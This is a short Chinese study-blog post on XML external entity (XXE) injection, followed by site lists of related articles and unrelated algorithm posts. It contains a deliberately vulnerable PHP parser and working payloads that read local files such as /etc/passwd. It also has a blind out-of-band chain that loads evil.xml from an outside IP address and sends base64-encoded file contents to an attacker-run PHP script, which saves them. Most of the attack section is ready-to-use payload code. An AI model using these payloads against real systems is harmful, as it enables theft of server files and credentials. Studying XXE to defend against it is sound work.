好久没学习技术了  很多东西都忘了  复习一下

测试代码

<?php

$xml = file_get_contents("php://input");

$data = simplexml_load_string($xml);

foreach ($data as $key => $value){

    echo "you  " . $key . "is  " . $value . "<br>";

}

?>

第一种方法

<?xml version="1.0" encoding="utf-8" ?>

<!DOCTYPE a [ <!ENTITY b SYSTEM "file:///D:/123.txt"> ]>

<user>

<test>&b;</test>

</user>

第二种方法

<?xml version="1.0" encoding="utf-8" ?>

<!DOCTYPE a [ <!ENTITY % d SYSTEM "http://host/test.dtd"> %d; ]>

<user>

<test>&b;</test>

</user>

test.dtd内容是
<!ENTITY b SYSTEM "file:///etc/passwd">

第三种方法

<!DOCTYPE a SYSTEM " http://host/test.dtd">

第四种 无回显的情况 提交

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE try[
<!ENTITY % int SYSTEM "http://123.206.229.100:8888//evil.xml">
%int;
%all;
%send;
]>







服务器1.php文件




<?php file_put_contents("1.txt",$_GET['file']); ?>






服务器evil.xml文件






<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///D:/123.txt">

<!ENTITY % all "<!ENTITY % send SYSTEM 'http://xxx.xxx.xxx/1.php?file=%file;'>">




												


											
xml实体注入学习的更多相关文章
	

    
								
  1. 3. XML实体注入漏洞的利用与学习
		
    XML实体注入漏洞的利用与学习 前言 XXE Injection即XML External Entity Injection,也就是XML外部实体注入攻击.漏洞是在对非安全的外部实体数据进行处理时引发 ...
    
		
    2. 
						
  2. XML实体注入漏洞
		
    XML实体注入漏洞 测试代码1: 新建xmlget.php,复制下面代码 <?php $xml=$_GET['xml']; $data = simplexml_load_string($xml) ...
    
		
    3. 
						
  3. 小试XML实体注入攻击
		
    基础知识 XML(Extensible Markup Language)被设计用来传输和存储数据.关于它的语法,本文不准备写太多,只简单介绍一下. XML基本知识 1 2 3 4 5 <?xml ...
    
		
    4. 
						
  4. 2.XML实体注入漏洞攻与防
		
    XML实体注入基础 当允许引用外部实体时,通过构造恶意内容,可导致读取任意文件.执行系统命令.探测内网端口.攻击内网网站等危害. 简单了解XML以后,我们知道要在XML中使用特殊字符,需要使用实体字符 ...
    
		
    5. 
						
  5. Fortify漏洞之XML External Entity Injection(XML实体注入)
		
    继续对Fortify的漏洞进行总结,本篇主要针对  XML External Entity Injection(XML实体注入) 的漏洞进行总结,如下: 1.1.产生原因: XML External  ...
    
		
    6. 
						
  6. 企业安全01-Apache solr XML实体注入漏洞CVE-2017-12629
		
    Apache solr XML 实体注入漏洞CVE-2017-12629 一.简介 Apache Solr 是一个开源的搜索服务器.Solr 使用 Java 语言开发,主要基于 HTTP 和 Apac ...
    
		
    7. 
						
  7. XXE(XML External Entity attack)XML外部实体注入攻击
		
    导语 XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击.由于程序在解析输入的XML数据时,解析了攻击者 ...
    
		
    8. 
						
  8. XML外部实体注入 安鸾 Writeup
		
    XML外部实体注入01 XML外部实体注入,简称XXE 网站URL:http://www.whalwl.host:8016/ 提示:flag文件在服务器根目录下,文件名为flag XML用于标记电子文 ...
    
		
    9. 
						
  9. PHP xml 外部实体注入漏洞学习
		
    XML与xxe注入基础知识 1.XMl定义 XML由3个部分构成,它们分别是:文档类型定义(Document Type Definition,DTD),即XML的布局语言:可扩展的样式语言(Exten ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. Codeforces510 C. Fox And Names
			
    Codeforces题号:#510C 出处: Codeforces 主要算法:判环+拓扑 难度:4.2 思路分析: 要是把这道题联系到图上就很容易想了. 如何建图?由于最后要求名字满足字典序,所以不妨 ...
    
			
    2. 
						
  2. python打印log重复问题
			
    本博客转载于:http://www.cnblogs.com/huang-yc/p/9209096.html,写得真不错 浅析python日志重复输出问题 目录 问题起源: 问题解析 解决办法 1.改名 ...
    
			
    3. 
						
  3. spfa优化板子
			
    用双端队列,当待加入元素小于队首元素时 加入队首, 否则 加入队尾 slf优化 if(!vis[e.v]) { if(Q.empty()) Q.push_front(e.v); else { if(d ...
    
			
    4. 
						
  4. 基于FPGA的数字秒表(数码管显示模块和按键消抖)实现
			
    本文主要是学习按键消抖和数码管动态显示,秒表显示什么的,个人认为,拿FPGA做秒表真是嫌钱多. 感谢 感谢学校和至芯科技,笔者专业最近去北京至芯科技培训交流了一周.老师的经验还是可以的,优化了自己的代 ...
    
			
    5. 
						
  5. 【XSY2665】没有上司的舞会 LCT DP
			
    题目大意 有一棵树,最开始只有一个点.每次会往这棵树中加一个点,总共\(n\)次.输出每次加点后树的最大独立集大小. 强制在线. \(n\leq 300000\) 题解 显然是LCT. 那么要维护什么 ...
    
			
    6. 
						
  6. centos7安装Jenkins更改默认端口并配置Ldap服务器进行用户认证
			
    应用环境:Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作.   Jenkins官网:https://jenkins.io/ 测试环境:一台Centos  ...
    
			
    7. 
						
  7. tyvj/joyoi 1336 火车进栈
			
    比原题水了很多(因为原题要高精度) 输出字典序前20种出栈序列. 其实是贪心题:我们每次确定一个出栈的数. 当栈里有数时,字典序显然比从后面拿数要小,所以先搜这个. 之后依次搜后面队列里的数,因为字典 ...
    
			
    8. 
						
  8. A1126. Eulerian Path
			
    In graph theory, an Eulerian path is a path in a graph which visits every edge exactly once. Similar ...
    
			
    9. 
						
  9. A1121. Damn Single
			
    "Damn Single (单身狗)" is the Chinese nickname for someone who is being single. You are suppo ...
    
			
    10. 
						
  10. 【洛谷P2042】维护数列
			
    题目大意:维护一个序列,支持区间插入,区间删除,区间翻转,查询区间元素和,查询区间最大子段和操作. 题解:毒瘤题...QAQ打完这道题发现自己以前学了一个假的 Splay.. 对于区间操作,用 spl ...
    
			
    11.